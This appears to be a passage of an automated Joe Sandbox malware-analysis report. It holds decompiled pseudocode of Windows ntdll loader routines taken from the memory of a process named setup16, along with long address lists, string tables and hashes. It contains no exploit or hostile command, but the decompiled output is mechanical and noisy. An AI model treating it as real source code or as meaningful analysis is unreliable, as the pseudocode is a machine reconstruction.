                                                                                                                                                                                                        0x049d3f8a
                                                                                                                                                                                                        0x049d3f8d
                                                                                                                                                                                                        0x049d3f90
                                                                                                                                                                                                        0x049d3f95
                                                                                                                                                                                                        0x04a2830d
                                                                                                                                                                                                        0x04a2830f
                                                                                                                                                                                                        0x049d3f9b
                                                                                                                                                                                                        0x049d3fac
                                                                                                                                                                                                        0x049d3fae
                                                                                                                                                                                                        0x049d3fb1
                                                                                                                                                                                                        0x049d3fb1
                                                                                                                                                                                                        0x049d3fb6
                                                                                                                                                                                                        0x04a28317
                                                                                                                                                                                                        0x04a2831a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d3fbc
                                                                                                                                                                                                        0x049d3fc1
                                                                                                                                                                                                        0x049d3fc9
                                                                                                                                                                                                        0x049d3fd7
                                                                                                                                                                                                        0x049d3fda
                                                                                                                                                                                                        0x049d3fdd
                                                                                                                                                                                                        0x049d4021
                                                                                                                                                                                                        0x049d4021
                                                                                                                                                                                                        0x049d4029
                                                                                                                                                                                                        0x049d4030
                                                                                                                                                                                                        0x049d4044
                                                                                                                                                                                                        0x049d4046
                                                                                                                                                                                                        0x049d4046
                                                                                                                                                                                                        0x049d4044
                                                                                                                                                                                                        0x049d4049
                                                                                                                                                                                                        0x04a28327
                                                                                                                                                                                                        0x04a28334
                                                                                                                                                                                                        0x04a28339
                                                                                                                                                                                                        0x04a2833c
                                                                                                                                                                                                        0x049d404f
                                                                                                                                                                                                        0x049d404f
                                                                                                                                                                                                        0x049d404f
                                                                                                                                                                                                        0x049d4051
                                                                                                                                                                                                        0x049d4056
                                                                                                                                                                                                        0x049d4063
                                                                                                                                                                                                        0x049d4063
                                                                                                                                                                                                        0x049d4068
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d4068
                                                                                                                                                                                                        0x049d3fdf
                                                                                                                                                                                                        0x049d3fe2
                                                                                                                                                                                                        0x049d3fe4
                                                                                                                                                                                                        0x049d3fe7
                                                                                                                                                                                                        0x049d3fef
                                                                                                                                                                                                        0x049d4003
                                                                                                                                                                                                        0x049d4005
                                                                                                                                                                                                        0x049d4005
                                                                                                                                                                                                        0x049d400c
                                                                                                                                                                                                        0x049d4013
                                                                                                                                                                                                        0x049d4016
                                                                                                                                                                                                        0x049d4017
                                                                                                                                                                                                        0x049d401b
                                                                                                                                                                                                        0x049d401e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d401e
                                                                                                                                                                                                        0x049d3fb6
                                                                                                                                                                                                        0x049d3eb1
                                                                                                                                                                                                        0x049d3eb4
                                                                                                                                                                                                        0x049d3eb7
                                                                                                                                                                                                        0x049d3ebc
                                                                                                                                                                                                        0x04a282a9
                                                                                                                                                                                                        0x04a282ab
                                                                                                                                                                                                        0x049d3ec2
                                                                                                                                                                                                        0x049d3ed3
                                                                                                                                                                                                        0x049d3ed5
                                                                                                                                                                                                        0x049d3ed8
                                                                                                                                                                                                        0x049d3ed8
                                                                                                                                                                                                        0x049d3edd
                                                                                                                                                                                                        0x04a282b3
                                                                                                                                                                                                        0x04a282b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d3ee3
                                                                                                                                                                                                        0x049d3ee8
                                                                                                                                                                                                        0x049d3eed
                                                                                                                                                                                                        0x049d3ef0
                                                                                                                                                                                                        0x049d3ef3
                                                                                                                                                                                                        0x049d3f02
                                                                                                                                                                                                        0x049d3f05
                                                                                                                                                                                                        0x049d3f08
                                                                                                                                                                                                        0x04a282c0
                                                                                                                                                                                                        0x04a282c3
                                                                                                                                                                                                        0x04a282c5
                                                                                                                                                                                                        0x04a282c8
                                                                                                                                                                                                        0x04a282d0
                                                                                                                                                                                                        0x04a282e4
                                                                                                                                                                                                        0x04a282e6
                                                                                                                                                                                                        0x04a282e6
                                                                                                                                                                                                        0x04a282ed
                                                                                                                                                                                                        0x04a282f4
                                                                                                                                                                                                        0x04a282f7
                                                                                                                                                                                                        0x04a282f8
                                                                                                                                                                                                        0x04a282fc
                                                                                                                                                                                                        0x04a282ff
                                                                                                                                                                                                        0x04a282ff
                                                                                                                                                                                                        0x049d3f0e
                                                                                                                                                                                                        0x049d3f11
                                                                                                                                                                                                        0x049d3f16
                                                                                                                                                                                                        0x049d3f1d
                                                                                                                                                                                                        0x049d3f31
                                                                                                                                                                                                        0x04a28307
                                                                                                                                                                                                        0x04a28307
                                                                                                                                                                                                        0x049d3f31
                                                                                                                                                                                                        0x049d3f39
                                                                                                                                                                                                        0x049d3f48
                                                                                                                                                                                                        0x049d3f4d
                                                                                                                                                                                                        0x049d3f50
                                                                                                                                                                                                        0x049d3f50
                                                                                                                                                                                                        0x049d3f53
                                                                                                                                                                                                        0x049d3f58
                                                                                                                                                                                                        0x049d3f65
                                                                                                                                                                                                        0x049d3f65
                                                                                                                                                                                                        0x049d3f6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d3f6a
                                                                                                                                                                                                        0x049d3edd
                                                                                                                                                                                                        0x049d3dda
                                                                                                                                                                                                        0x049d3ddd
                                                                                                                                                                                                        0x049d3de0
                                                                                                                                                                                                        0x049d3de5
                                                                                                                                                                                                        0x04a28245
                                                                                                                                                                                                        0x049d3deb
                                                                                                                                                                                                        0x049d3df7
                                                                                                                                                                                                        0x049d3dfc
                                                                                                                                                                                                        0x049d3dfe
                                                                                                                                                                                                        0x049d3e01
                                                                                                                                                                                                        0x049d3e01
                                                                                                                                                                                                        0x049d3e06
                                                                                                                                                                                                        0x04a2824d
                                                                                                                                                                                                        0x04a2824f
                                                                                                                                                                                                        0x04a28254
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d3e0c
                                                                                                                                                                                                        0x049d3e11
                                                                                                                                                                                                        0x049d3e16
                                                                                                                                                                                                        0x049d3e19
                                                                                                                                                                                                        0x049d3e29
                                                                                                                                                                                                        0x049d3e2c
                                                                                                                                                                                                        0x049d3e2f
                                                                                                                                                                                                        0x04a2825c
                                                                                                                                                                                                        0x04a2825f
                                                                                                                                                                                                        0x04a28261
                                                                                                                                                                                                        0x04a28264
                                                                                                                                                                                                        0x04a2826c
                                                                                                                                                                                                        0x04a28280
                                                                                                                                                                                                        0x04a28282
                                                                                                                                                                                                        0x04a28282
                                                                                                                                                                                                        0x04a28289
                                                                                                                                                                                                        0x04a28290
                                                                                                                                                                                                        0x04a28293
                                                                                                                                                                                                        0x04a28294
                                                                                                                                                                                                        0x04a28298
                                                                                                                                                                                                        0x04a2829b
                                                                                                                                                                                                        0x04a2829b
                                                                                                                                                                                                        0x049d3e35
                                                                                                                                                                                                        0x049d3e38
                                                                                                                                                                                                        0x049d3e3d
                                                                                                                                                                                                        0x049d3e44
                                                                                                                                                                                                        0x049d3e58
                                                                                                                                                                                                        0x04a282a3
                                                                                                                                                                                                        0x04a282a3
                                                                                                                                                                                                        0x049d3e58
                                                                                                                                                                                                        0x049d3e60
                                                                                                                                                                                                        0x049d3e6f
                                                                                                                                                                                                        0x049d3e74
                                                                                                                                                                                                        0x049d3e77
                                                                                                                                                                                                        0x049d3e77
                                                                                                                                                                                                        0x049d3e7a
                                                                                                                                                                                                        0x049d3e7f
                                                                                                                                                                                                        0x049d3e8c
                                                                                                                                                                                                        0x049d3e8c
                                                                                                                                                                                                        0x049d3e91
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d3e91

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 049D3F70
                                                                                                                                                                                                        • WindowsExcludedProcs, xrefs: 049D3D6F
                                                                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 049D3DC0
                                                                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 049D3E97
                                                                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 049D3D8C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                        • API String ID: 0-258546922
                                                                                                                                                                                                        • Opcode ID: 6967d82c48c9d95dd887f1c2c9ae05a9c87fa281ca5d9b73ca2ecd6f41129149
                                                                                                                                                                                                        • Instruction ID: 6059ef8375153350136a10f028229a0a8018ed24de75abcdc59cd6c5f713da86
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6967d82c48c9d95dd887f1c2c9ae05a9c87fa281ca5d9b73ca2ecd6f41129149
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91F15072D00218EFDB15DFD8DA40AEEBBB9FF48750F14456AE905A7250E774AE00DBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                                        			E049F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4abd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4ab8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4ab5780 & 0x00000003) != 0) {
							E04A45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4ab5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04A0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4ab7984; // 0xa72ad8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4ab8464; // 0x761c0110
					 *0x4abb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E049F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4ab5780 & 0x00000005) != 0) {
						_push(_t49);
						E04A45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                                                                                                        0x049f8e0f
                                                                                                                                                                                                        0x049f8e16
                                                                                                                                                                                                        0x049f8e19
                                                                                                                                                                                                        0x049f8e1b
                                                                                                                                                                                                        0x049f8e21
                                                                                                                                                                                                        0x049f8e7f
                                                                                                                                                                                                        0x049f8e85
                                                                                                                                                                                                        0x04a39354
                                                                                                                                                                                                        0x04a3936c
                                                                                                                                                                                                        0x04a39371
                                                                                                                                                                                                        0x04a3937b
                                                                                                                                                                                                        0x04a39381
                                                                                                                                                                                                        0x04a39381
                                                                                                                                                                                                        0x04a3937b
                                                                                                                                                                                                        0x049f8e9d
                                                                                                                                                                                                        0x049f8e9d
                                                                                                                                                                                                        0x049f8e29
                                                                                                                                                                                                        0x049f8e2c
                                                                                                                                                                                                        0x049f8e38
                                                                                                                                                                                                        0x049f8e3e
                                                                                                                                                                                                        0x049f8e43
                                                                                                                                                                                                        0x049f8eb5
                                                                                                                                                                                                        0x049f8eb9
                                                                                                                                                                                                        0x04a392aa
                                                                                                                                                                                                        0x04a392af
                                                                                                                                                                                                        0x04a392e8
                                                                                                                                                                                                        0x04a392e8
                                                                                                                                                                                                        0x04a392af
                                                                                                                                                                                                        0x049f8eb9
                                                                                                                                                                                                        0x049f8e45
                                                                                                                                                                                                        0x049f8e53
                                                                                                                                                                                                        0x049f8e5b
                                                                                                                                                                                                        0x049f8e5f
                                                                                                                                                                                                        0x049f8e78
                                                                                                                                                                                                        0x049f8e78
                                                                                                                                                                                                        0x049f8e7d
                                                                                                                                                                                                        0x049f8ec3
                                                                                                                                                                                                        0x049f8ecd
                                                                                                                                                                                                        0x049f8ed2
                                                                                                                                                                                                        0x049f8ed2
                                                                                                                                                                                                        0x049f8ec5
                                                                                                                                                                                                        0x049f8ec5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f8e7d
                                                                                                                                                                                                        0x049f8e67
                                                                                                                                                                                                        0x049f8ea4
                                                                                                                                                                                                        0x04a3931a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39320
                                                                                                                                                                                                        0x049f8ea4
                                                                                                                                                                                                        0x049f8e70
                                                                                                                                                                                                        0x04a39325
                                                                                                                                                                                                        0x04a39340
                                                                                                                                                                                                        0x04a39345
                                                                                                                                                                                                        0x04a39345
                                                                                                                                                                                                        0x049f8e76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 04A3933B, 04A39367
                                                                                                                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04A3932A
                                                                                                                                                                                                        • LdrpFindDllActivationContext, xrefs: 04A39331, 04A3935D
                                                                                                                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 04A39357
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                        • API String ID: 0-3779518884
                                                                                                                                                                                                        • Opcode ID: 27db7a3160727af74a4a59724696362121cd5a5c43cbf41be8c20221b0f59484
                                                                                                                                                                                                        • Instruction ID: ce6acd3f7b9515b17649a23065fd3089d135c4f42d4d65d97c82f08ac21f5ba0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27db7a3160727af74a4a59724696362121cd5a5c43cbf41be8c20221b0f59484
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F412472F00311AFDFA5FE088C8CA7AB6ADEB40308F094579EA1857161E7B0BC8087C1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E049D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E049D934A() != 0) {
								_t159 = E04A4A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4ab5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04A45510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4ab5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E049D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E049D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E049D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4ab5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4ab5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E049E2280(_t92, 0x4ab86cc);
															_t94 = E04A99DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E049F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4ab5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E049D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4ab5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4ab5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04A0F380(_t136, 0x49a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E049E2280(_t108, 0x4ab86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E049F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04A99D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E049DFFB0(_t118, _t156, 0x4ab86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04A09A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                                                                                                        0x049d8799
                                                                                                                                                                                                        0x049d879d
                                                                                                                                                                                                        0x049d87a1
                                                                                                                                                                                                        0x049d87a3
                                                                                                                                                                                                        0x049d87a8
                                                                                                                                                                                                        0x049d87c3
                                                                                                                                                                                                        0x049d87c3
                                                                                                                                                                                                        0x049d87c8
                                                                                                                                                                                                        0x049d87d1
                                                                                                                                                                                                        0x049d87d4
                                                                                                                                                                                                        0x049d87d8
                                                                                                                                                                                                        0x049d87e5
                                                                                                                                                                                                        0x049d87ec
                                                                                                                                                                                                        0x04a29bfe
                                                                                                                                                                                                        0x04a29c00
                                                                                                                                                                                                        0x04a29c02
                                                                                                                                                                                                        0x04a29c08
                                                                                                                                                                                                        0x04a29c0d
                                                                                                                                                                                                        0x04a29c0f
                                                                                                                                                                                                        0x04a29c14
                                                                                                                                                                                                        0x04a29c2d
                                                                                                                                                                                                        0x04a29c32
                                                                                                                                                                                                        0x04a29c37
                                                                                                                                                                                                        0x04a29c3a
                                                                                                                                                                                                        0x04a29c3c
                                                                                                                                                                                                        0x04a29c42
                                                                                                                                                                                                        0x04a29c42
                                                                                                                                                                                                        0x04a29c3c
                                                                                                                                                                                                        0x04a29c02
                                                                                                                                                                                                        0x049d87da
                                                                                                                                                                                                        0x049d87df
                                                                                                                                                                                                        0x049d87e3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d87e3
                                                                                                                                                                                                        0x049d87f2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d87fb
                                                                                                                                                                                                        0x049d87fd
                                                                                                                                                                                                        0x049d87fe
                                                                                                                                                                                                        0x049d880e
                                                                                                                                                                                                        0x049d880f
                                                                                                                                                                                                        0x049d8810
                                                                                                                                                                                                        0x049d8814
                                                                                                                                                                                                        0x049d881a
                                                                                                                                                                                                        0x049d881c
                                                                                                                                                                                                        0x049d881f
                                                                                                                                                                                                        0x049d8821
                                                                                                                                                                                                        0x049d8822
                                                                                                                                                                                                        0x049d8824
                                                                                                                                                                                                        0x049d8826
                                                                                                                                                                                                        0x049d882c
                                                                                                                                                                                                        0x049d882e
                                                                                                                                                                                                        0x04a29c48
                                                                                                                                                                                                        0x04a29c48
                                                                                                                                                                                                        0x049d8834
                                                                                                                                                                                                        0x049d8834
                                                                                                                                                                                                        0x049d8837
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8837
                                                                                                                                                                                                        0x049d882e
                                                                                                                                                                                                        0x049d883d
                                                                                                                                                                                                        0x049d8840
                                                                                                                                                                                                        0x049d8843
                                                                                                                                                                                                        0x049d8846
                                                                                                                                                                                                        0x049d8849
                                                                                                                                                                                                        0x049d884c
                                                                                                                                                                                                        0x049d884e
                                                                                                                                                                                                        0x049d8850
                                                                                                                                                                                                        0x049d8852
                                                                                                                                                                                                        0x049d8854
                                                                                                                                                                                                        0x049d8857
                                                                                                                                                                                                        0x049d88b4
                                                                                                                                                                                                        0x049d88b6
                                                                                                                                                                                                        0x049d88b6
                                                                                                                                                                                                        0x049d8859
                                                                                                                                                                                                        0x049d8859
                                                                                                                                                                                                        0x049d8859
                                                                                                                                                                                                        0x049d8861
                                                                                                                                                                                                        0x049d8866
                                                                                                                                                                                                        0x049d886a
                                                                                                                                                                                                        0x049d893d
                                                                                                                                                                                                        0x049d8941
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8947
                                                                                                                                                                                                        0x049d8947
                                                                                                                                                                                                        0x049d894a
                                                                                                                                                                                                        0x049d894c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8952
                                                                                                                                                                                                        0x049d8955
                                                                                                                                                                                                        0x049d895a
                                                                                                                                                                                                        0x049d895d
                                                                                                                                                                                                        0x049d895d
                                                                                                                                                                                                        0x049d895f
                                                                                                                                                                                                        0x049d8961
                                                                                                                                                                                                        0x049d8961
                                                                                                                                                                                                        0x049d8968
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d896a
                                                                                                                                                                                                        0x049d896b
                                                                                                                                                                                                        0x049d896e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8970
                                                                                                                                                                                                        0x049d8970
                                                                                                                                                                                                        0x049d8970
                                                                                                                                                                                                        0x049d8970
                                                                                                                                                                                                        0x049d8972
                                                                                                                                                                                                        0x049d8972
                                                                                                                                                                                                        0x049d8974
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d897a
                                                                                                                                                                                                        0x049d897a
                                                                                                                                                                                                        0x049d897d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8983
                                                                                                                                                                                                        0x04a29c65
                                                                                                                                                                                                        0x04a29c6d
                                                                                                                                                                                                        0x04a29c72
                                                                                                                                                                                                        0x04a29c75
                                                                                                                                                                                                        0x04a29c75
                                                                                                                                                                                                        0x04a29c82
                                                                                                                                                                                                        0x04a29c86
                                                                                                                                                                                                        0x04a29c87
                                                                                                                                                                                                        0x04a29c88
                                                                                                                                                                                                        0x04a29c89
                                                                                                                                                                                                        0x04a29c8c
                                                                                                                                                                                                        0x04a29c90
                                                                                                                                                                                                        0x04a29c95
                                                                                                                                                                                                        0x04a29c97
                                                                                                                                                                                                        0x04a29ca0
                                                                                                                                                                                                        0x04a29ca3
                                                                                                                                                                                                        0x04a29ca9
                                                                                                                                                                                                        0x04a29ca9
                                                                                                                                                                                                        0x00000000
